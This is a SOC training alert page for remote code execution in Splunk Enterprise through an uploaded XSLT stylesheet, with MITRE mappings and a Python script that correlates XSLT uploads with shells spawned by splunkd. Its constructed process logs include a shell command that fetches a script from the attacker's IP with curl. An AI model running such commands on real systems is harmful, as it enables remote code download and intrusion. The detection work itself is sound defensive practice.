LetsDefend Monitoring Alert

Remote Code Execution Detected in Splunk Enterprise

Nov, 21, 2023, 12:24 PM

Event ID: 201

Event Time: Nov, 21, 2023, 12:24 PM

Rule Name: SOC239 - Remote Code Execution Detected in Splunk Enterprise

Alert Type: Unauthorized Access

MITRE Technique:
T1190 - Initial Access - Exploit Public-Facing Application,
T1136 - Persistence - Create Account,
T1199 - Initial Access - Trusted Relationship,
T1059.004 - Execution - Command and Scripting Interpreter: Unix Shell,
T1210 - Lateral Movement - Exploitation of Remote Services
Real World Example: Splunk App for Lookup File Editing RCE via User XSLT

Severity: High
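The alert chains two of the listed techniques: a public-facing Splunk Web endpoint accepting an attacker-supplied XSLT stylesheet (T1190), then the Splunk process spawning a Unix shell (T1059.004). The correlation rule below is an added example written for this page; it is not LetsDefend's detection logic or Splunk's own tooling. The access and process log lines, the hostnames, IP addresses, usernames, the upload endpoint path and the five-minute window are all constructed assumptions for illustration.

```python
"""
Added example, not part of the LetsDefend alert or of Splunk's own tooling.

Correlates the two stages this alert maps to MITRE ATT&CK:
  T1190     a web request that uploads an XSLT stylesheet to Splunk Web, and
  T1059.004 a Unix shell spawned by the splunkd process on the same host soon after.
Log lines, hostnames, IP addresses, usernames and the endpoint path are
constructed for illustration (assumptions, not data taken from the alert).
"""
import os
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)          # assumption: upload-to-shell gap worth alerting on
SHELLS = {"sh", "bash", "dash", "zsh"}  # interpreters counted as a Unix shell
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed Splunk Web access events (key=value layout chosen for this example).
WEB_EVENTS = """\
ts=2023-11-21T11:50:00Z host=splunk-01 src=198.51.100.7 user=analyst method=POST path=/en-US/splunkd/__upload/indexing/preview status=200 upload="hosts.csv"
ts=2023-11-21T12:23:10Z host=splunk-01 src=203.0.113.45 user=admin method=POST path=/en-US/splunkd/__upload/indexing/preview status=200 upload="report.xsl"
ts=2023-11-21T12:23:40Z host=splunk-01 src=203.0.113.45 user=admin method=GET path=/en-US/app/search status=200 upload="-"
""".splitlines()

# Constructed process-creation events from the same host (EDR / auditd style).
PROC_EVENTS = """\
ts=2023-11-21T11:52:00Z host=splunk-01 parent=splunkd user=splunk cmd="/opt/splunk/bin/python3 bin/lookup_edit.py"
ts=2023-11-21T12:24:05Z host=splunk-01 parent=splunkd user=splunk cmd="/bin/sh -c id"
ts=2023-11-21T12:24:30Z host=splunk-01 parent=splunkd user=splunk cmd="/bin/bash -c curl http://203.0.113.45/x.sh"
ts=2023-11-21T12:25:00Z host=splunk-02 parent=sshd user=ops cmd="/bin/bash -l"
""".splitlines()


def parse_kv(line: str) -> dict:
    """Parse one key=value line; quoted values may contain spaces. ts becomes a datetime."""
    ev = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
    return ev


def is_xslt_upload(ev: dict) -> bool:
    """T1190 stage: a successful POST whose uploaded file is an XSLT stylesheet."""
    return (ev.get("method") == "POST"
            and ev.get("status", "").startswith("2")
            and ev.get("upload", "").lower().endswith((".xsl", ".xslt")))


def is_splunkd_shell(ev: dict) -> bool:
    """T1059.004 stage: splunkd directly spawning a Unix shell."""
    exe = ev.get("cmd", "").split(" ", 1)[0]
    return ev.get("parent") == "splunkd" and os.path.basename(exe) in SHELLS


def correlate(web_lines, proc_lines, window=WINDOW) -> list:
    """Return one alert per XSLT upload that is followed, on the same host and
    within `window`, by at least one shell spawned from splunkd."""
    uploads = [e for e in map(parse_kv, web_lines) if is_xslt_upload(e)]
    shells = [e for e in map(parse_kv, proc_lines) if is_splunkd_shell(e)]
    alerts = []
    for up in uploads:
        cmds = [s["cmd"] for s in shells
                if s["host"] == up["host"] and up["ts"] <= s["ts"] <= up["ts"] + window]
        if cmds:
            alerts.append({
                "host": up["host"], "src": up["src"], "user": up["user"],
                "upload": up["upload"], "upload_ts": up["ts"].isoformat(),
                "commands": cmds, "techniques": ["T1190", "T1059.004"],
            })
    return alerts


if __name__ == "__main__":
    for a in correlate(WEB_EVENTS, PROC_EVENTS):
        print(f"[{a['host']}] {a['src']} ({a['user']}) uploaded {a['upload']} "
              f"-> splunkd shells: {a['commands']}")
```

On the constructed data only the admin session's `report.xsl` upload is followed by splunkd-spawned shells, so one alert is raised; the analyst's CSV upload and the unrelated SSH shell on splunk-02 are ignored. When triaging a real hit, the source IP, the uploading user and the exact shell command lines in the alert are the fields to pivot on for the follow-on techniques listed above (new accounts for T1136, connections to other hosts for T1210).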


2024 © LetsDefend
